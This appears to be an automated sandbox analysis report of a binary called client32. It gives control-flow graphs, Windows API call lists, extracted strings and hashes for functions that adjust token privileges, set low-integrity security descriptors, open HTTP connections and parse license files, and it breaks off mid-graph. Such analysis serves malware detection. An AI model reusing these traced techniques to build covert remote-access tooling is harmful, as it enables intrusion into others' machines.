                                                                              control_flow_graph 774 1109e5b0-1109e612 call 1109dda0 777 1109e618-1109e63b call 1109d860 774->777 778 1109ec30 774->778 783 1109e641-1109e655 LocalAlloc 777->783 784 1109e7a4-1109e7a6 777->784 780 1109ec32-1109ec4d call 11162bb7 778->780 786 1109e65b-1109e68d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 783->786 787 1109ec25-1109ec2b call 1109d8f0 783->787 788 1109e736-1109e75b CreateFileMappingA 784->788 791 1109e71a-1109e730 786->791 792 1109e693-1109e6be call 1109d7d0 call 1109d810 786->792 787->778 789 1109e7a8-1109e7bb GetLastError 788->789 790 1109e75d-1109e77d GetLastError call 110d6c20 788->790 796 1109e7bd 789->796 797 1109e7c2-1109e7d9 MapViewOfFile 789->797 802 1109e788-1109e790 790->802 803 1109e77f-1109e786 LocalFree 790->803 791->788 822 1109e709-1109e711 792->822 823 1109e6c0-1109e6f6 GetSecurityDescriptorSacl 792->823 796->797 800 1109e7db-1109e7f6 call 110d6c20 797->800 801 1109e817-1109e81f 797->801 816 1109e7f8-1109e7f9 LocalFree 800->816 817 1109e7fb-1109e803 800->817 804 1109e8c1-1109e8d3 801->804 805 1109e825-1109e83e GetModuleFileNameA 801->805 812 1109e792-1109e793 LocalFree 802->812 813 1109e795-1109e79f 802->813 803->802 808 1109e919-1109e932 _memset GetTickCount 804->808 809 1109e8d5-1109e8d8 804->809 810 1109e8dd-1109e8f8 call 110d6c20 805->810 811 1109e844-1109e84d 805->811 824 1109e934-1109e939 808->824 818 1109e9bf-1109ea23 GetCurrentProcessId GetModuleFileNameA call 1109dc30 809->818 840 1109e8fa-1109e8fb LocalFree 810->840 841 1109e8fd-1109e905 810->841 811->810 819 1109e853-1109e856 811->819 812->813 821 1109ec1e-1109ec20 call 1109dce0 813->821 816->817 827 1109e808-1109e812 817->827 828 1109e805-1109e806 LocalFree 817->828 845 1109ea2b-1109ea42 CreateEventA 818->845 846 1109ea25 818->846 831 1109e899-1109e8bc call 110d6c20 call 1109dce0 819->831 832 1109e858-1109e85c 819->832 821->787 822->791 835 1109e713-1109e714 FreeLibrary 822->835 823->822 834 1109e6f8-1109e703 SetSecurityDescriptorSacl 823->834 825 1109e93b-1109e94a 824->825 826 1109e94c 824->826 825->824 825->826 836 1109e94e-1109e954 826->836 827->821 828->827 831->804 832->831 839 1109e85e-1109e869 832->839 834->822 835->791 842 1109e965-1109e9bd 836->842 843 1109e956-1109e963 836->843 847 1109e870-1109e874 839->847 840->841 848 1109e90a-1109e914 841->848 849 1109e907-1109e908 LocalFree 841->849 842->818 843->836 843->842 851 1109ea44-1109ea63 GetLastError * 2 call 110d6c20 845->851 852 1109ea66-1109ea6e 845->852 846->845 853 1109e890-1109e892 847->853 854 1109e876-1109e878 847->854 848->821 849->848 851->852 859 1109ea70 852->859 860 1109ea76-1109ea87 CreateEventA 852->860 855 1109e895-1109e897 853->855 857 1109e87a-1109e880 854->857 858 1109e88c-1109e88e 854->858 855->810 855->831 857->853 864 1109e882-1109e88a 857->864 858->855 859->860 861 1109ea89-1109eaa8 GetLastError * 2 call 110d6c20 860->861 862 1109eaab-1109eab3 860->862 861->862 866 1109eabb-1109eacd CreateEventA 862->866 867 1109eab5 862->867 864->847 864->858 869 1109eacf-1109eaee GetLastError * 2 call 110d6c20 866->869 870 1109eaf1-1109eaf9 866->870 867->866 869->870 872 1109eafb 870->872 873 1109eb01-1109eb12 CreateEventA 870->873 872->873 875 1109eb34-1109eb42 873->875 876 1109eb14-1109eb31 GetLastError * 2 call 110d6c20 873->876 877 1109eb44-1109eb45 LocalFree 875->877 878 1109eb47-1109eb4f 875->878 876->875 877->878 880 1109eb51-1109eb52 LocalFree 878->880 881 1109eb54-1109eb5d 878->881 880->881 883 1109eb63-1109eb66 881->883 884 1109ec07-1109ec19 call 110d6c20 881->884 883->884 886 1109eb6c-1109eb6f 883->886 884->821 886->884 888 1109eb75-1109eb78 886->888 888->884 889 1109eb7e-1109eb81 888->889 890 1109eb8c-1109eba8 CreateThread 889->890 891 1109eb83-1109eb89 GetCurrentThreadId 889->891 892 1109ebaa-1109ebb4 890->892 893 1109ebb6-1109ebc0 890->893 891->890 892->821 894 1109ebda-1109ec05 SetEvent call 110d6c20 call 1109d8f0 893->894 895 1109ebc2-1109ebd8 ResetEvent * 3 893->895 894->780 895->894
                                                                              APIs
                                                                                • Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,AB86ACF8,00080000,00000000,?), ref: 1109D88D
                                                                                • Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                • Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                • Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                              • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,AB86ACF8,00080000,00000000,?), ref: 1109E645
                                                                              • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
                                                                              • GetVersionExA.KERNEL32(?), ref: 1109E680
                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
                                                                              • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
                                                                              • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
                                                                              • CreateFileMappingA.KERNEL32(000000FF,11030703,00000004,00000000,?,?), ref: 1109E750
                                                                              • GetLastError.KERNEL32 ref: 1109E75D
                                                                              • LocalFree.KERNEL32(?), ref: 1109E786
                                                                              • LocalFree.KERNEL32(?), ref: 1109E793
                                                                              • GetLastError.KERNEL32 ref: 1109E7B0
                                                                              • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
                                                                              • LocalFree.KERNEL32(?), ref: 1109E7F9
                                                                              • LocalFree.KERNEL32(?), ref: 1109E806
                                                                                • Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E69E), ref: 1109D7D8
                                                                                • Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D824
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
                                                                              • LocalFree.KERNEL32(?), ref: 1109E8FB
                                                                              • LocalFree.KERNEL32(?), ref: 1109E908
                                                                              • _memset.LIBCMT ref: 1109E920
                                                                              • GetTickCount.KERNEL32 ref: 1109E928
                                                                              • GetCurrentProcessId.KERNEL32 ref: 1109E9D4
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
                                                                              • GetLastError.KERNEL32 ref: 1109EA44
                                                                              • GetLastError.KERNEL32(00000000), ref: 1109EA4B
                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
                                                                              • GetLastError.KERNEL32 ref: 1109EA89
                                                                              • GetLastError.KERNEL32(00000000), ref: 1109EA90
                                                                              • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
                                                                              • GetLastError.KERNEL32 ref: 1109EACF
                                                                              • GetLastError.KERNEL32(00000000), ref: 1109EAD6
                                                                              • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
                                                                              • GetLastError.KERNEL32 ref: 1109EB1A
                                                                              • GetLastError.KERNEL32(00000000), ref: 1109EB1D
                                                                              • LocalFree.KERNEL32(?), ref: 1109EB45
                                                                              • LocalFree.KERNEL32(?), ref: 1109EB52
                                                                              • GetCurrentThreadId.KERNEL32 ref: 1109EB83
                                                                              • CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
                                                                              • ResetEvent.KERNEL32(?), ref: 1109EBCC
                                                                              • ResetEvent.KERNEL32(?), ref: 1109EBD2
                                                                              • ResetEvent.KERNEL32(?), ref: 1109EBD8
                                                                              • SetEvent.KERNEL32(?), ref: 1109EBDE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                              • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                              • API String ID: 3291243470-2792520954
                                                                              • Opcode ID: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                              • Instruction ID: a3fd055aacadca8d823d44ca49761fd5d24e706f53ed4dbc48f97bf713fa71f6
                                                                              • Opcode Fuzzy Hash: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                              • Instruction Fuzzy Hash: A612B2B5E0026D9FEB24DF60CDD4EAAB7BAFB88304F0049A9E51D97640D671AD84CF50
                                                                              Function 11029BB0 Relevance: 91.5, APIs: 40, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 900 11029bb0-11029c3e LoadLibraryA 901 11029c41-11029c46 900->901 902 11029c48-11029c4b 901->902 903 11029c4d-11029c50 901->903 904 11029c65-11029c6a 902->904 905 11029c52-11029c55 903->905 906 11029c57-11029c62 903->906 907 11029c99-11029ca5 904->907 908 11029c6c-11029c71 904->908 905->904 906->904 911 11029d4a-11029d4d 907->911 912 11029cab-11029cc3 call 11163a11 907->912 909 11029c73-11029c8a GetProcAddress 908->909 910 11029c8c-11029c8f 908->910 909->910 913 11029c91-11029c93 SetLastError 909->913 910->907 915 11029d68-11029d80 InternetOpenA 911->915 916 11029d4f-11029d66 GetProcAddress 911->916 922 11029ce4-11029cf0 912->922 923 11029cc5-11029cde GetProcAddress 912->923 913->907 918 11029da4-11029db0 call 11163aa5 915->918 916->915 917 11029d99-11029da1 SetLastError 916->917 917->918 928 11029db6-11029de7 call 11142e60 call 11165250 918->928 929 1102a02a-1102a034 918->929 927 11029cf2-11029cfb GetLastError 922->927 930 11029d11-11029d13 922->930 923->922 925 11029d82-11029d8a SetLastError 923->925 925->927 927->930 931 11029cfd-11029d0f call 11163aa5 call 11163a11 927->931 953 11029de9-11029dec 928->953 954 11029def-11029e04 call 11081d30 * 2 928->954 929->901 932 1102a03a 929->932 936 11029d30-11029d3c 930->936 937 11029d15-11029d2e GetProcAddress 930->937 931->930 935 1102a04c-1102a04f 932->935 942 1102a051-1102a056 935->942 943 1102a05b-1102a05e 935->943 936->911 955 11029d3e-11029d47 936->955 937->936 940 11029d8f-11029d97 SetLastError 937->940 940->911 946 1102a1bf-1102a1c7 942->946 948 1102a060-1102a065 943->948 949 1102a06a 943->949 951 1102a1d0-1102a1e3 946->951 952 1102a1c9-1102a1ca FreeLibrary 946->952 956 1102a18f-1102a194 948->956 957 1102a06d-1102a075 949->957 952->951 953->954 975 11029e06-11029e0a 954->975 976 11029e0d-11029e19 954->976 955->911 960 1102a196-1102a1ad GetProcAddress 956->960 961 1102a1af-1102a1b5 956->961 958 1102a077-1102a08e GetProcAddress 957->958 959 1102a094-1102a0a2 InternetQueryDataAvailable 957->959 958->959 963 1102a14e-1102a150 SetLastError 958->963 964 1102a156-1102a15d 959->964 965 1102a0a8-1102a0ad 959->965 960->961 966 1102a1b7-1102a1b9 SetLastError 960->966 961->946 963->964 970 1102a16c-1102a18d call 11027f00 * 2 964->970 969 1102a0b3-1102a0ef call 11110230 call 11027eb0 965->969 965->970 966->946 990 1102a101-1102a103 969->990 991 1102a0f1-1102a0f4 969->991 970->956 975->976 979 11029e44-11029e49 976->979 980 11029e1b-11029e1d 976->980 987 11029e4b-11029e5c GetProcAddress 979->987 988 11029e5e-11029e75 InternetConnectA 979->988 984 11029e34-11029e3a 980->984 985 11029e1f-11029e32 GetProcAddress 980->985 984->979 985->984 989 11029e3c-11029e3e SetLastError 985->989 987->988 992 11029ea1-11029eac SetLastError 987->992 993 1102a017-1102a027 call 11162777 988->993 994 11029e7b-11029e7e 988->994 989->979 998 1102a105 990->998 999 1102a10c-1102a111 990->999 991->990 997 1102a0f6-1102a0fa 991->997 992->993 993->929 1000 11029e80-11029e82 994->1000 1001 11029eb9-11029ec1 994->1001 997->990 1005 1102a0fc 997->1005 998->999 1006 1102a113-1102a129 call 110d12e0 999->1006 1007 1102a12c-1102a12e 999->1007 1008 11029e84-11029e97 GetProcAddress 1000->1008 1009 11029e99-11029e9f 1000->1009 1003 11029ec3-11029ed7 GetProcAddress 1001->1003 1004 11029ed9-11029ef4 HttpOpenRequestA 1001->1004 1003->1004 1013 11029ef6-11029efe SetLastError 1003->1013 1014 11029f01-11029f04 1004->1014 1005->990 1006->1007 1011 1102a130-1102a132 1007->1011 1012 1102a134-1102a145 call 11162777 1007->1012 1008->1009 1010 11029eb1-11029eb3 SetLastError 1008->1010 1009->1001 1010->1001 1011->1012 1018 1102a15f-1102a169 call 11162777 1011->1018 1012->970 1027 1102a147-1102a149 1012->1027 1013->1014 1020 1102a012-1102a015 1014->1020 1021 11029f0a-11029f0f 1014->1021 1018->970 1020->993 1022 1102a03c-1102a049 call 11162777 1020->1022 1025 11029f11-11029f28 GetProcAddress 1021->1025 1026 11029f2a-11029f36 1021->1026 1022->935 1025->1026 1030 11029f38-11029f40 SetLastError 1025->1030 1031 11029f42-11029f5b GetLastError 1026->1031 1027->957 1030->1031 1034 11029f76-11029f8b 1031->1034 1035 11029f5d-11029f74 GetProcAddress 1031->1035 1038 11029f95-11029fa3 GetLastError 1034->1038 1035->1034 1036 11029f8d-11029f8f SetLastError 1035->1036 1036->1038 1039 11029fa5-11029faa 1038->1039 1040 11029fac-11029fb8 GetDesktopWindow 1038->1040 1039->1040 1041 1102a002-1102a007 1039->1041 1042 11029fd3-11029fef 1040->1042 1043 11029fba-11029fd1 GetProcAddress 1040->1043 1041->1020 1044 1102a009-1102a00f 1041->1044 1042->1020 1047 11029ff1 1042->1047 1043->1042 1045 11029ff6-1102a000 SetLastError 1043->1045 1044->1020 1045->1020 1047->1014
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(WinInet.dll,AB86ACF8,74DF23A0,?,00000000), ref: 11029BE5
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029C93
                                                                              • _malloc.LIBCMT ref: 11029CB7
                                                                              • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
                                                                              • GetLastError.KERNEL32 ref: 11029CF2
                                                                              • _free.LIBCMT ref: 11029CFE
                                                                              • _malloc.LIBCMT ref: 11029D07
                                                                              • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
                                                                              • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
                                                                              • InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029D84
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029D91
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029D9B
                                                                              • _free.LIBCMT ref: 11029DA5
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029E3E
                                                                              • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
                                                                              • InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
                                                                              • SetLastError.KERNEL32(00000078), ref: 11029EA3
                                                                              • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
                                                                              • HttpOpenRequestA.WININET(?,GET,1119A6D8,00000000,00000000,00000000,8040F000,00000000), ref: 11029EEF
                                                                              • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
                                                                              • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
                                                                              • InternetQueryDataAvailable.WININET(1117FC4B,1102CCC1,00000000,00000000), ref: 1102A09E
                                                                              • SetLastError.KERNEL32(00000078), ref: 1102A150
                                                                              • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
                                                                              • SetLastError.KERNEL32(00000078), ref: 1102A1B9
                                                                              • FreeLibrary.KERNEL32(?), ref: 1102A1CA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$ErrorLast$Internet$FreeLibraryOpen_free_malloc$AvailableConnectDataHeapHttpLoadQueryRequest
                                                                              • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                              • API String ID: 579908884-913974648
                                                                              • Opcode ID: 672cd097590bfd03c9fe4a36dbc9c03aeb2e34a222513bbefa7f0796f77ae97c
                                                                              • Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
                                                                              • Opcode Fuzzy Hash: 672cd097590bfd03c9fe4a36dbc9c03aeb2e34a222513bbefa7f0796f77ae97c
                                                                              • Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60
                                                                              Function 110627B0 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                • Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                              • _fgets.LIBCMT ref: 110628E2
                                                                              • _strpbrk.LIBCMT ref: 11062949
                                                                              • _fgets.LIBCMT ref: 11062A4C
                                                                              • _strpbrk.LIBCMT ref: 11062AC3
                                                                              • __wcstoui64.LIBCMT ref: 11062ADC
                                                                              • _fgets.LIBCMT ref: 11062B55
                                                                              • _strpbrk.LIBCMT ref: 11062B7B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                              • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                              • API String ID: 716802716-1571441106
                                                                              • Opcode ID: 8c48605410795d9e3cd25b9d18f26d9f12cdafcf37fc271b1508f1aea2d58ae0
                                                                              • Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
                                                                              • Opcode Fuzzy Hash: 8c48605410795d9e3cd25b9d18f26d9f12cdafcf37fc271b1508f1aea2d58ae0
                                                                              • Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91
                                                                              Function 11139ED0 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 474windowthreadCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1771 11139ed0-11139f05 1772 11139f12-11139f19 1771->1772 1773 11139f07-11139f0d GetCurrentThreadId 1771->1773 1774 11139f20-11139f3c call 11134830 call 11134310 1772->1774 1775 11139f1b call 11029950 1772->1775 1773->1772 1781 11139f42-11139f48 1774->1781 1782 1113a01b-1113a022 1774->1782 1775->1774 1783 1113a59a-1113a5b5 call 11162bb7 1781->1783 1784 11139f4e-11139faf call 11139a70 IsWindow IsWindowVisible call 11147060 call 1105e820 IsWindowVisible 1781->1784 1785 1113a0da-1113a0f0 1782->1785 1786 1113a028-1113a02f 1782->1786 1820 1113a011 1784->1820 1821 11139fb1-11139fb7 1784->1821 1796 1113a0f6-1113a0fd 1785->1796 1797 1113a22f 1785->1797 1786->1785 1788 1113a035-1113a03c 1786->1788 1788->1785 1792 1113a042-1113a051 FindWindowA 1788->1792 1792->1785 1795 1113a057-1113a05c IsWindowVisible 1792->1795 1795->1785 1799 1113a05e-1113a065 1795->1799 1800 1113a0ff-1113a109 1796->1800 1801 1113a10e-1113a12e call 1105e820 1796->1801 1802 1113a231-1113a242 1797->1802 1803 1113a275-1113a280 1797->1803 1799->1785 1807 1113a067-1113a08c call 11139a70 IsWindowVisible 1799->1807 1800->1803 1801->1803 1817 1113a134-1113a163 1801->1817 1809 1113a244-1113a254 1802->1809 1810 1113a25a-1113a26f 1802->1810 1804 1113a282-1113a2a2 call 1105e820 1803->1804 1805 1113a2b6-1113a2bc 1803->1805 1828 1113a2b0 1804->1828 1829 1113a2a4-1113a2ae call 1102d750 1804->1829 1813 1113a2be-1113a2ca call 11139a70 1805->1813 1814 1113a2cd-1113a2d5 1805->1814 1807->1785 1832 1113a08e-1113a09d IsIconic 1807->1832 1809->1810 1810->1803 1813->1814 1824 1113a2e7 1814->1824 1825 1113a2d7-1113a2e2 call 1106c340 1814->1825 1839 1113a165-1113a179 call 11081d30 1817->1839 1840 1113a17e-1113a191 call 11143e00 1817->1840 1820->1782 1821->1820 1830 11139fb9-11139fd0 call 11147060 GetForegroundWindow 1821->1830 1827 1113a2e7 call 1112ddd0 1824->1827 1825->1824 1835 1113a2ec-1113a2f2 1827->1835 1828->1805 1829->1805 1851 11139fd2-11139ffc EnableWindow call 11132120 * 2 EnableWindow 1830->1851 1852 11139ffe-1113a000 1830->1852 1832->1785 1833 1113a09f-1113a0ba GetForegroundWindow call 11132120 * 2 1832->1833 1875 1113a0cb-1113a0d4 EnableWindow 1833->1875 1876 1113a0bc-1113a0c2 1833->1876 1841 1113a2f4-1113a2fa call 11132a10 1835->1841 1842 1113a2fd-1113a306 1835->1842 1839->1840 1864 1113a17b 1839->1864 1865 1113a193-1113a1a4 GetLastError call 11147060 1840->1865 1866 1113a1ae-1113a1b5 1840->1866 1841->1842 1849 1113a314 call 111326b0 1842->1849 1850 1113a308-1113a30b 1842->1850 1858 1113a319-1113a31f 1849->1858 1850->1858 1859 1113a30d-1113a312 call 11132780 1850->1859 1851->1852 1852->1820 1854 1113a002-1113a008 1852->1854 1854->1820 1863 1113a00a-1113a00b SetForegroundWindow 1854->1863 1868 1113a325-1113a32b 1858->1868 1869 1113a429-1113a434 call 11139600 1858->1869 1859->1858 1863->1820 1864->1840 1865->1866 1879 1113a1b7-1113a1d2 1866->1879 1880 1113a228 1866->1880 1871 1113a331-1113a339 1868->1871 1872 1113a3db-1113a3e3 1868->1872 1889 1113a436-1113a448 call 110642e0 1869->1889 1890 1113a455-1113a45b 1869->1890 1871->1869 1881 1113a33f-1113a345 1871->1881 1872->1869 1885 1113a3e5-1113a423 call 1103f920 call 1103f960 call 1103f980 call 1103f940 call 11110000 1872->1885 1875->1785 1876->1875 1884 1113a0c4-1113a0c5 SetForegroundWindow 1876->1884 1887 1113a1d5-1113a1e1 1879->1887 1880->1797 1881->1869 1888 1113a34b-1113a362 call 111101b0 1881->1888 1884->1875 1885->1869 1892 1113a1e3-1113a1f7 call 11081d30 1887->1892 1893 1113a1fc-1113a209 call 11143e00 1887->1893 1906 1113a384 1888->1906 1907 1113a364-1113a382 call 11057eb0 1888->1907 1889->1890 1909 1113a44a-1113a450 call 11142d90 1889->1909 1897 1113a461-1113a468 1890->1897 1898 1113a58a-1113a592 1890->1898 1892->1893 1912 1113a1f9 1892->1912 1893->1880 1914 1113a20b-1113a226 GetLastError call 11147060 1893->1914 1897->1898 1904 1113a46e-1113a487 call 1105e820 1897->1904 1898->1783 1904->1898 1919 1113a48d-1113a4a0 1904->1919 1915 1113a386-1113a3d2 call 1110fff0 call 1104d790 call 1104ecd0 call 